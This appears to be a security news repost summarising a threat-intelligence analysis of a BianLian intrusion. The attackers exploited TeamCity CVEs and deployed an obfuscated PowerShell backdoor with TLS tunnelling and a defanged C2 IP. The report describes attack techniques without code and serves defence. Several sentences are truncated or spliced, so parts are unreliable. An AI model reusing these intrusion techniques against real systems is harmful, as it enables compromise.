In conjunction with GuidePoint's DFIR team, we responded to an incident that began with the exploitation of a TeamCity server which resulted in the deployment of a PowerShell implementation of BianLian's GO backdoor.
The threat actor identified a vulnerable TeamCity server and leveraged CVE-2024-27198 /CVE-2023-42793 for initial access into the environment, creating users in TeamCity and invoking malicious commands under the TeamCity product's service account.
Exe on the build servers to remotely run commands from the exploited TeamCity server and leveraged BITSAdmin to deploy additional tools, including a malicious PowerShell script, web.
The threat actor was detected in the environment after attempting to conduct a Security Accounts Manager credential dumping technique, which alerted the victim's VSOC, GuidePoint's DFIR team, and GuidePoint's Threat Intelligence Team and initiated the in-depth review of this PowerShell backdoor.
After multiple failed attempts to execute their standard GO backdoor, the threat actor pivoted to living off the land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their GO backdoor.
First Level Analysis The PowerShell backdoor was obfuscated but didn't leverage any novel techniques that significantly hindered analysis.
Second Layer Analysis At first glance, the second layer of the PowerShell script was an absolute mess, so we were less than excited to proceed.
Multiple methods were called throughout the script regarding SSL streams and TCP sockets, which gave this script more of a tunnel or backdoor feel than a simple downloader, but more analysis was needed to be sure.
As we continued our analysis, we realized that the cookies function was responsible for a majority of the network connection management and high-level execution performed by the suspected backdoor.
Perhaps the most interesting component of this whole backdoor was the innovative use of the Runspace Pool in conjunction with the.
In past analysis of malicious PowerShell scripts, attackers have commonly leveraged Invoke-Command or Invoke-Expression as a means of executing malicious code, which provides a less asynchronous and potentially more detectable method of executing commands.
Network Capability Callouts At this stage of analysis, we have all but confirmed that this is a backdoor that allows for a remote attacker to arbitrarily conduction operations on an infected system, much the same as BianLian's GO trojan allows for.
What puts the icing on the cake is confirming all the networking capabilities associated with this script and confirming that these are the same types of capabilities observed with other backdoors and, especially, BianLian's GO backdoor.
One thing that BianLian is known for in regard to their GO backdoor is the use of certificates for authentication; in fact, that's how many security researchers proactively identify their infrastructure.
This type of behavior has been replicated in the PowerShell implementation of their backdoor as well.
The main advantage of this backdoor, as we have seen with BianLian's GO implementation, is that it provides flexibility during post-exploitation activities while masking activity within an encrypted tunnel.
As previously mentioned, the last line of the PowerShell script we analyzed showed the calling of the cookies function with some specified parameters.
When the hexadecimal value passed in Cookies Param1 is converted into decimal notation, the value observed is 136[.]0[.]3[.]71. Doing some quick OSINT searching shows that, according to C2IntelFeeds, this IP address is associated with a server that was running the BianLian GO backdoor as of March 6th, 2024, which corresponds to activity observed within this incident.
D shortly before the first successful execution of the PowerShell backdoor.
Based on these findings of shared infrastructure and AV detections, GRIT assesses with a high confidence that the analyzed PowerShell script is a PowerShell implementation of the BianLian GO Backdoor.
This Cyber News was published on securityboulevard.com. Publication date: Sat, 09 Mar 2024 15:43:05 +0000